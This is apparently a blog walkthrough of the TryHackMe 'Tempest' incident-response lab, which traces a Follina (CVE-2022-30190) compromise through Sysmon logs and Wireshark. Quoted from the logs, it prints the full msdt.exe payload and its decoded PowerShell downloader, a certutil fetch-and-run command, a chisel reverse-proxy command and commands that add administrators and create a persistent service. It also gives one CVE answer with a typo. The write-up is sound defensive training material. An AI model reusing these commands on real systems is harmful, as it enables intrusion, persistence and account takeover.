Tempest - TryHackMe Write-up

Link to room: https://tryhackme.com/room/tempestincident

This room aims to introduce the process of analysing endpoint and network logs from a compromised asset. Given the artefacts, we will aim to uncover the incident from the Tempest machine. In this scenario, you will be tasked to be one of the Incident Responders that will focus on handling and analysing the captured artefacts of a compromised machine.

What is the SHA256 hash of the capture.pcapng file?

If we scroll up a wee bit we can see the command we need: Get-FileHash -Algorithm SHA256 .\capture.pcapng set as an example. Get-FileHash is a PowerShell cmdlet that computes a cryptographic hash for a file. We can use that to determine the hash values for the 3 files we are looking at.

We can also use certutil for this task with certutil.exe -hashfile .\capture.pcapng SHA256 as an example.

Note: certutil will output in lowercase letters by default it seems.

Screenshot of a command prompt window showing the use of the and commands on a file named . Both commands calculate the SHA256 hash of the file, with the same resulting hash value displayed for each: , verifying the integrity and consistency of the file.

💡

Remember to use Tab to auto-complete as you go, makes this less painful!

\= CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6

What is the SHA256 hash of the sysmon.evtx file?

We can follow along and use the Get-FileHash cmdlet as this seems to work pretty well.

Screenshot of a PowerShell command to generate a file hash using SHA256. The file "sysmon.evtx" is located in "C:sersseresktopncident Files". The computed hash is "665DC3519C2C23518820185A8594FEA205C3BCB C75193363B87D2837ACA3C91F".

\= 665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F

What is the SHA256 hash of the windows.evtx file?

Now we are on a roll!

PowerShell command output showing the use of "Get-FileHash" with the SHA256 algorithm on a file named "windows.evtx". The hash value is displayed along with the file path.

💡

I find it best to always manually type out these commands, is easy to just copy and paste but I think it sticks better the more manual work you do.

\= D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60

Tempest Incident

In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.

The user of this machine was compromised by a malicious document. What is the file name of the document?

Looking at the information given to us we know that the file is a .doc file and it was downloaded with chrome.exe.

I thought I would have a look at Sysmon View for this. We can open the windows.evtx file and then use Event Viewer to Save All Events As… as an .xml file. This will allow us to open the events in Sysmon View.

Flowchart depicting events from Sysmon View, showing entries for process creation, file creation, and DNS queries associated with "chrome.exe" and "explorer.exe". Includes detailed timestamps, file paths, and error codes.

To see the same information in the screenshot above by opening the .xml file we just generated in Sysmon View. Then look for chrome.exe on the left, click, then click the Image Path then click on the Sessions (GUIDs). You can click on multiple items.

It’s an interesting way of visualizing data, what we are looking at here in the node in the bottom right corner. We see File Stream Created and under that a particular looking ~~.doc~~ file.

\= free_magicules.doc

I’ve worked more with Timeline Explorer so for the purposes of the rest of the exercise I am going to be using that although it’s always interesting to use both pieces of software as you can see how data is connected in 2 different ways, might be easier to visualize.

Screenshot of Timeline Explorer v2.0.0.1 displaying a list of Sysmon events. Columns include Line, Tag, Record Number, Event Record ID, Time Created, Level, Provider, Channel, Process ID, Computer, and User ID. The table is partially filled with event data. A search bar at the top right has ".doc" entered, and a small thumbnail of the window is visible in the bottom left.

Again THM have kindly laid out all the shortcuts we need on the taskbar.

Open Timeline Explorer, File > Open > sysmon.csv.

At the find box at the top right, I filtered with “.doc”.

We find multiple results for “.doc” all pointing to free_magicules.doc

What is the name of the compromised user and machine?

Looking at this Process creation entry we see: Tempest/benimaru

A screenshot of the Timeline Explorer v2.0.0.1 software displaying a CSV file named "sysmon.csv." The columns shown include Event ID, Map Description, and User Name with various entries such as "FileCreateStreamHash" and "Process creation."

\= benimaru-tempest

What is the PID of the Microsoft Word process that opened the malicious document?

In the Executable Info for this event (scroll a lot to the right) we see:

"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\benimaru\Downloads\free_magicules.doc" /o ""

Confirming that this is the event we need in relation to Microsoft Word.

Scrolling a lot to the left we will find under Payload Data1 that ProcessID is 496.

\= 496

Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?

Make sure to first delete the “.doc” filter in the top right corner (easily forgotten about).

Seeing as we are looking at resolved domains, it makes sense to look at Sysmon Event ID 22. This is for DNSEvents (DNS Queries). We can have a look and see if Microsoft Word is trying to reach to any domains.

Under Event Id type in 22 and under Payload Data1 type in Process ID: 496 as we know this is WINWORD.exe and we know that Event ID 22 is for looking up domains.

A screenshot of the Timeline Explorer v2.0.0.1 interface displaying a file named sysmon.csv. The data table shows columns such as "ad Data2," "Payload Data3," "Payload Data4," and others, with entries including file paths and query names like "officecdn.microsoft.com.edgesuite.net" and "augloop.office.com." Query status and results are also listed.

phishteam.xyz has my attention and we should take note of it. In Payload Data6 we can see the QueryResults:. I think it shows the IPv6 and IPv4 results for phishteam.xyz. Specifically we want the IPv4 address in this scenario.

We can double click on the cell and copy it’s contents.

\= 167.71.199.191

What is the base64 encoded string in the malicious payload executed by the document?

So for this one we are looking at Sysmon Event ID 1 for process creation. We can replace our 22 with 1 in the appropriate box. Now we know the document inside Microsoft Word has a PID of 496. Using that in the appropriate Payload Data box doesn’t reveal what we want. However we can also look at Microsoft Word as the Parent Process and see if it spawns anymore processes where we might be able to spot a base64 encoded string.

Tip: Looking at Payload Data5 we can see all our Parent Processes, clicking on the tiny little symbol at the top right that looks like a wee cocktail glass shows us all the results. We can then click on the 2 entries for Parent Process: 496.

A software interface of "Timeline Explorer" version 2.0.0.1 displaying a CSV file named "sysmon.csv." Visible data includes parent process details with IDs and GUIDs. A text filter pane is open, listing multiple parent process entries with checkboxes.

We can scroll a little to the right where we will find “Executable Info” and the bottom entry sure looks juicy.

A screenshot of Timeline Explorer v2.0.0.1 displaying a table with columns for Executable Info and Source File. It shows paths of Microsoft and SysWOW64 executables from sysmon.csv.

C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

Simply copy and paste the Base64 encoded string! It’s the literal single quotation marks and has a little padding (\==) at the end.

\= JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==

What is the CVE number of the exploit used by the attacker to achieve a remote code execution?

Here a wee hint from THM:

“External research needed. Observe the parent-child relationship of Winword.exe and the process that executed the malicious base64 payload”

Looking at that exact entry where we got our Base64 encoded string we can see the process that executed this was C:\Windows\SysWOW64\msdt.exe.

I just googled msdt.exe winword.exe CVE and the first results was exactly what I was looking for!

Brought me here: https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

“Guidance for CVE-2022-30190”

\= 2022-301190

The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?

Here is the hint from THM: “The AppData environment variable can be simplified.”

Reading the description for this task I took the base64 encoded string we found earlier and put it into Cyberchef: https://gchq.github.io/CyberChef/

This is the result:

$app=[Environment]::GetFolderPath('ApplicationData');cd "$app\Microsoft\Windows\Start Menu\Programs\Startup"; iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip; Expand-Archive .\update.zip -DestinationPath .; rm update.zip;

We can see that it’s navigating to the Startup folder to make this more persistent. We can see iwr being used here or Invoke Web Request. We are downloading a file, specifically - http://phishteam.xyz/02dcf07/update.zip, unzipping then promptly deleting the zip file to cover up tracks a bit.

Seeing as we have the update.zip information, I looked it up in Timeline Explorer.

A screenshot of Timeline Explorer v2.0.0.1 displaying a CSV file. A section showing "TargetFilename" highlights the path: "C:sersenimaruppDataoamingicrosoftindowstart Menurogramstartuppdate.zip."

Found one entry and under Payload Data4 we can see our TargetFilename:

\= C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.zip

The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user?

Seeing as we have found the phishteam.xyz domain, I decided that would be a good place to look.

Doing so will reveal some DNS results and some more juicier details:

A Timeline Explorer window showing search results for "phishteam.xyz" within a CSV file. Several entries display PowerShell commands downloading and executing files from the specified URL, highlighted in orange. The interface includes options like File, Tools, Tabs, View, and Help in the menu bar.

We can see some very suspicious .exe files, however the one we want to look at here is first.exe. Copy the Executable Info and remove the quotations around the powershell.exe part.

\= C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution?

Using information we already know, I looked up first.exe.

A screenshot of Timeline Explorer software displaying search results for "first.exe" in sysmon.csv. The results show various command lines involving file paths and network activities, with "first.exe" highlighted several times.

Looking at this entry with Executable Info” of “C:\Users\Public\Downloads\first.exe

Scrolling a bunch to the left under Payload Data3 we will find MD5, SHA256 and IMPHASH values. Looking at our entry and the SHA256 part we find our hash value!

\= CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8

The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker?

The answer here isn’t phishteam.xyz, that one seems to be used to download the needed files. We are looking for another server, the c2 server. A rather simple and crude method might be to just lookup more .xyz domains as the adversaries here seem to enjoy using them.

If doing so will actually reveal another domain under Payload Data4.

A smarter way of looking up this information might be via DNS instead. We know that there is a domain that needs resolved here so lets use Sysmon Event ID 22 for this task.

Heading over the Event ID we can plomp in 22.

Back over the Payload Data4 we see all the domains being resolved by the host. Including one with a fair few requests…

Screenshot of Timeline Explorer v2.0.0.1 showing a list of file paths and query details. The interface includes multiple tabs at the top, with columns labeled "Payload Data4" and "Payload Data5." The data includes entries with file paths like "Microsoft OneDriveneDrive.exe" and query names such as "onedriveclucproddm20002.blob.core.windows.net." Each entry has a "QueryStatus" of 0.

Tip: Filtering with .xyz and using Event ID: 22 will give us 2 results.

\= resolvecyber.xyz:80

What is the URL of the malicious payload embedded in the document?

Well we know that phishteam.xyz and resolvecyber.xyz are up to no good. It looks to me that the resolvecyber.xyz domain is the C2 and phishteam.xyz is a file server for downloads.

Lets open up the capture.pcapng file in Wireshark and have a closer look.

If we use:

http.host matches "phishteam.xyz"

as a search filter in Wireshark we will find a bunch of results.

Screenshot of a Wireshark capture file showing network packets filtered by the expression "http.host matches 'phishteam.xyz'". Rows display details such as packet number, time, source, destination IP addresses, protocol (HTTP), packet length, and information about HTTP requests.

We can see some of suspicious files again along with the index.html file where they came from under a random directory: 02dcf07

\= http://phishteam.xyz/02dcf07/index.html

What is the encoding used by the attacker on the c2 connection?

This time looking at the C2 server resolvecyber.xyz we see a lot of traffic of what looks like base64 encoded strings:

A screenshot of Wireshark displaying network packets filtered by the host "resolvecyber.xyz." It shows HTTP GET requests from the source IP "192.168.254.107" to the destination "167.71.222.162." The selected packet is highlighted, showing details of the HTTP request and response in the lower pane.

There are GET requests to 167.71.222.162. These requests are trying to make queries encoded in base64 at a directory called 9ab62b5. These queries are using GET requests to send information to the C2 by enclosing the base64 encoded strings in segments within the queries themselves.

A pretty clever way to send data by acting like it’s trying to receive information. Using the request itself.

“I want a cup of milk”, also means “I am letting you know about the milk I want”. To receive we must also send.

\= base64

The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?

I referred to these as queries, partly because if we inspect one of the packets:

Frame 5566: 264 bytes on wire (2112 bits), 264 bytes captured (2112 bits) on interface \Device\NPF_{79F1317E-A1C6-4B81-B4C8-AC13A41243C9}, id 0
Ethernet II, Src: VMware_a3:cb:4e (00:0c:29:a3:cb:4e), Dst: zte_22:ff:de (98:00:6a:22:ff:de)
Internet Protocol Version 4, Src: 192.168.254.107, Dst: 167.71.222.162
Transmission Control Protocol, Src Port: 51890, Dst Port: 80, Seq: 1, Ack: 1, Len: 210
Hypertext Transfer Protocol
    GET /9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K HTTP/1.1\r\n
    Host: resolvecyber.xyz\r\n
    Connection: Keep-Alive\r\n
    user-agent: Nim httpclient/1.6.6\r\n
    \r\n
    [Full request URI: http://resolvecyber.xyz/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K]
    [HTTP request 1/1]
    [Response in frame: 5569]

We see the GET request, the directory /9ab62b5 and ?q=.

q is the variable that holds the base64 encoded string.

\= q

The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?

We looked at the GET request, the directory/URL and the q variable.

We know it’s under the /9ab62b5 URL

\= 9ab62b5

What is the HTTP method used by the binary?

Again looking at the all the information we have so far, we know it’s a GET request

\= GET

Based on the user agent, what programming language was used by the attacker to compile the binary?

Looking back at packet we are inspecting we see user-agent: Nim httpclient/1.6.6\r\n

\= nim

The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?

With:

http.host matches "resolvecyber.xyz"

still being filtered in Wireshark we can see all these segmented base64 encoded strings. The answer we are looking for is in one of these strings.

This is how I found the piece of the puzzle that we are looking for:

I right clicked on the first GET request with base64 encoded string and clicked Follow > TCP Stream.

These brings me here:

Screenshot of a Wireshark capture showing a list of network packets. The highlighted packet is an HTTP GET request to "resolvecyber.xyz" with a "200 OK" response in the follow TCP stream window below. User-agent is "Nim httpclient/1.6.6".

What I did from here is simply go through the Streams. You can see at the bottom right there is the word Stream and next to that 138. If you click the little arrow up you can work through the traffic streams.

You can see the outbound traffic with the GET request and the response from the server giving a 200 OK.

Going through the Streams can take some time, what we are focusing on is the big juicy GET requests, remembering that these is actually the ex-filtrated data being sent out.

We copy the base64 strings and pop them into CyberChef to be decoded.

Screenshot of an online Base64 decoder tool. The interface includes sections labeled "Recipe," "Input," and "Output." The input contains encoded Base64 text, and the output shows decoded PowerShell script with user and password credentials. The interface has various buttons and options for interacting with the data.

Above is the correct packet we need, specifically Packet 5893 and Stream 160.

We can a variable called $pass which looks interesting.

I realize this might not be the easiest or sleekest way of going about find this information.

The other option you have at hand is to use Tshark, and create an awesome command that will take all these base64 strings and stitch them all together to create one large juicy master base64 encoded string. Then you can go ahead and decode it in terminal or bring it over to CyberChef to continue working on it. There are definitely Write-ups out there that have this feature, I managed to get it working but it is fiddly and can be tricky to setup. Once it’s setup it’s very nice. Sometimes I go about these things doing it a little slower and clunkier (manually), I still get the answer I need but not as fast. If you factor in getting the Tshark commands correct, I may be coming out of this quicker, many ways to achieve this though!

\= infernotempest

The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?

While we are still following the TCP Stream we can go up a few until we reach a juicy result:

Screenshot of Wireshark with a TCP stream displayed. The upper section shows a list of captured packets with details such as time, source, destination, protocol, length, and info. The lower section reveals a follow TCP stream window containing a GET request displaying encoded data and HTTP response details.

Specifically Packet 5919 and Stream 162.

Let’s put that bad boy in CyberChef

Screenshot of a Base64 decoding tool with an input and output section. The input section contains encoded text, and the output shows a list of network connections from a command, detailing protocol, local and foreign addresses, connection states, and process IDs.

💡

When using CyberChef make sure you are using the official version at https://gchq.github.io/. Depending on your search engine, you might be using an older version of it deployed elsewhere.

We know that we are looking for a 4 digit port so that narrow’s down the results.

Having a cheeky Google of the 4 ports that we are looking at brings some interesting results for port 5985

This is for winrm (Microsoft Windows Remote Management).

💡

You can hold Alt on the keyboard and drag a box around the specific area you want highlighted or copied in the CyberChef output. For example copying the 4 ports we are looking at.

\= 5985

The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection?

We are already on Stream 162 so I just went up one to Stream 163 and found a base64 string received that could well be a command being run.

You know what’s coming next, back to CyberChef!

Screenshot of a Base64 decoding process. The input field contains a Base64 string, and the output field shows a PowerShell command to download a file named "ch.exe" from a URL to a specified location on a computer.

We see a powershell command to download a sketchy looking .exe called ch.exe.

I decided to head back into Timeline Explorer and look for this ch.exe.

Screenshot of the Timeline Explorer v2.0.0.1 interface displaying data from a CSV file. The highlighted term is "ch.exe," shown in various file paths and PowerShell commands. An additional window at the bottom shows more detailed file path information.

Indeed in Executable Info we find what looks like a reverse socks proxy: client 167.71.199.191:8080 R:socks

\= C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks

What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?

If we continue looking at this event but scroll a bit to the left under Payload Data3 we will find the 3 hash values of ch.exe

Looking at SHA256 we find the answer.

\= 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451

What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.

There is a THM hint: “External research needed. Use the SHA256 hash to determine the name of the tool.”

We can take our copied SHA256 hash and inspect it on VirusTotal.com.

Screenshot of a security analysis showing a file flagged as malicious by 56 out of 72 vendors. The file is identified as "chisel.exe" with a size of 7.85 MB. Common threat labels include hacktool, trojan, and the community score is -54.

Under Family labels we see chisel, hack and htool.

The want we want is the former.

\= chisel

The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate?

THM hint: “External research needed. Use the process name to determine the service name.”

We already identified the open port of 5985 attached to the winrm service

\= winrm

After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary?

We know there was another binary downloaded shortly after ch.exe.

Heading back into Wireshark let’s have a look at our file download server phishteam.xyz

Screenshot of a Wireshark network analysis displaying multiple HTTP requests. The table shows details such as time, source, destination, protocol, length, and info. The highlighted lines indicate requests to a domain, "phishteam.xyz," with various files being accessed.

Among the files downloaded we find spf.exe. We can take that info, head back into Timeline Explorer and search for it.

The cell with Executable Info of "C:\Users\benimaru\Downloads\spf.exe" -c C:\ProgramData\final.exe is the one we are looking at. Scroll to the left and look under Payload Data3 to find the SHA256 hash.

\= 8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D

Based on the SHA256 hash of the binary, what is the name of the tool used?

Taking that same SHA256 hash we can paste it in to VirusTotal to see what comes up.

Screenshot of a virus scan result. PrintSpoofer.exe is identified as malicious by 58 out of 72 security vendors. Threat labels include "trojan" and "hacktool". The file details show a size of 26.50 KB, and the analysis was conducted 9 hours ago.

Under Family labels we see what we are looking for.

\= printspoofer

The tool exploits a specific privilege owned by the user. What is the name of the privilege?

THM Hint: “External research needed. Read about the tool to see the privilege being abused.”

We know it’s known as printspoofer so I did a quick Google and the first result was a github page: https://github.com/itm4n/PrintSpoofer

The literal first line tells how it abuses a certain privilege on Windows 10 and Server.

\= SeImpersonatePrivilege

Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?

It only makes sense to head back into Wireshark and look at the next binary being downloaded.

A screenshot of Wireshark capturing HTTP packets filtered by the host "phishteam.xyz". The list shows various HTTP GET and HEAD requests with details like source, destination, protocol, and length. The bottom pane displays packet details for a selected request involving "final.exe".

We can see final.exe, looking at final.exe in Timeline Explorer shows a bunch of internet traffic.

\= final.exe

The binary connects to a different port from the first c2 connection. What is the port used?

Into Wireshark for this one with filter

http.host matches "resolvecyber.xyz"

to look at the C2 traffic again.

We can click on a packet, then on the middle pane under Transmission Control Protocol we can look at Destination Port: 80 and Apply as Column so see all traffic with it’s destination port which will make things a little easier.

A screenshot of Wireshark displaying network packet details. The context menu is open, showing options like "Apply as Column" highlighted. The packets are listed with columns for number, time, source, destination, protocol, length, and info.

Scroll down a bit and we can the traffic changes a little. We go from using Destination Port:80 to Destination Port: 8080.

Network packet capture displayed in Wireshark. The table shows multiple HTTP requests from source IP 192.168.254.107 to destination IP 167.71.222.162 on port 8080. Detailed packet info is provided below the table.

\= 8080

Upon achieving SYSTEM access, the attacker then created two users. What are the account names?

I didn’t find a super elegant way of filtering for this, only to do some basic filtering and find results manually.

We know we are looking at SYSTEM access, so let’s start filtering with NT AUTHORITY/SYSTEM.

A screenshot of the Timeline Explorer software interface, version 2.0.0.1, displaying a list of process creation events with user name "NT AUTHORITYYSTEM". There's a filter panel on the right, showing a list of user names with "NT AUTHORITYYSTEM" selected.

We can also do a bit more filtering by looking Sysmon Event ID 1 (process creation).

A screenshot of Timeline Explorer version 2.0.0.1 displaying a detailed table of system events. The table includes columns like Line, Tag, Record Number, Event Record ID, Time Created, Level, Provider, Channel, Process ID, Computer, and User ID. A filter menu is open, showing options to search and select values for the Level column.

That will bring our results down a fair bit. Looking a bit deeper we will find:

Screenshot of Timeline Explorer displaying CSV data from a file named sysmon.csv. The data includes columns labeled Data4, Payload Data5, Payload Data6, and Executable Info, showing various system command lines and executable paths.

We can actually filter further if we search for user /add at the top right.

A screenshot of the Timeline Explorer v2.0.0.1 interface showing filtered search results for "user /add" in 'sysmon.csv'. Several command lines are highlighted, involving the addition of users in the Windows system32 directory using "net.exe". Users and groups being added include "shuna" and "shion".

\= shion, shuna

Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?

We already know this but if we filter with user at the top right, it might be a littler easier to see

A screenshot of Timeline Explorer v2.0.0.1 displaying a CSV file, "sysmon.csv," with columns titled "Data4," "Payload Data5," "Payload Data6," and "Executable Info." The data includes various processes, parent process IDs, command lines, and user-related activities, with highlighted terms in orange such as "user" and specific usernames.

We can see the adversary tried to add a user but failed to do so. They later succeeded with adding /add to the command.

\= /add

Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?

Here’s the hint from THM: “External research needed. Find out what event ID logs successful account creation.”

I just Googled windows event id account creation

First result gives me 4720

\= 4720

The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker?

We can use all our previous filters here: Event ID = 1, User Name = NT AUTHORITY/SYSTEM, Search = user /add.

Screenshot of the Timeline Explorer application displaying a CSV file named "sysmon.csv". It shows columns for Data3, Payload Data4, and Executable Info, listing command executions such as adding users and groups via "net.exe". Specific commands like "user /add shuna princess" and "localgroup administrators /add shion" are highlighted.

The formatting here is important.

\= net localgroup administrators /add shion

Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?

I went about this a couple of different ways.

First was a bit manual.

Opening the windows.csv file in Timeline Explorer that I have previously used (the file can be generated just like the sysmon.csv file).

We can look at the Map Description section and just browse around.

Screenshot of the Timeline Explorer application showing a CSV file with entries detailing user account activities, like account creation and group membership changes. The "Map Description" column includes phrases such as "A new account was created" and "A member was added to a security-enabled local group." The "User Name" column lists "WORKGROUPEMPEST$."

This one caught my eye. Scrolling to the left we can see it’s Event ID 4732.

Another way is just a Google job, I just searched for member added to admin group windows event id and first result did the trick.

\= 4732

After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this?

For this I looked about in a manual sense again, looking into the Executable Info as we know this is a command executed.

After a bit of looking I found:

A screenshot of Timeline Explorer version 2.0.0.1 displaying a log file with columns titled "Executable Info" and "Source File". The highlighted entry shows a command for creating a service named "TempestUpdate" with a binary path to "C:rogramDatainal.exe". Various IP addresses are listed in preceding columns.

The start= auto makes it look suspicious and persistent.

Looking then at the event, we know it Event ID = 1 and looking back previously it’s likely that whatever is going on near the end of this exercise has something to do with final.exe.

A screenshot of Timeline Explorer showing a list of executable processes. The term "final.exe" is highlighted multiple times, indicating its repeated occurrence in the logs. The interface includes columns such as Executable Info and Source File.

That brings it down a bit.

\= C:\Windows\system32\sc.exe \TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto

We can see the adversary is targeting the TEMPEST machine and creating a new service called TempestUpdate, then defining the binary used as the final.exe executable, then finishing it off with some persistence making it run on startup with start= auto.

Well done! We made it! This is to date (18.08.25) my longest write-up, so juicy! I am hoping to refine my writing and bring more write-ups soon.

As for the exercise itself, we got more familiar with Event ID’s, Timeline Explorer, filtering and understanding how an adversary might use different techniques.

💡

I did Tempest a few times, the first couple of times didn’t really cement in what was happening. I would encourage you to reset the challenge and start again. Keep going until you don’t need to lean on write-ups, AI or Google.

Thanks for reading!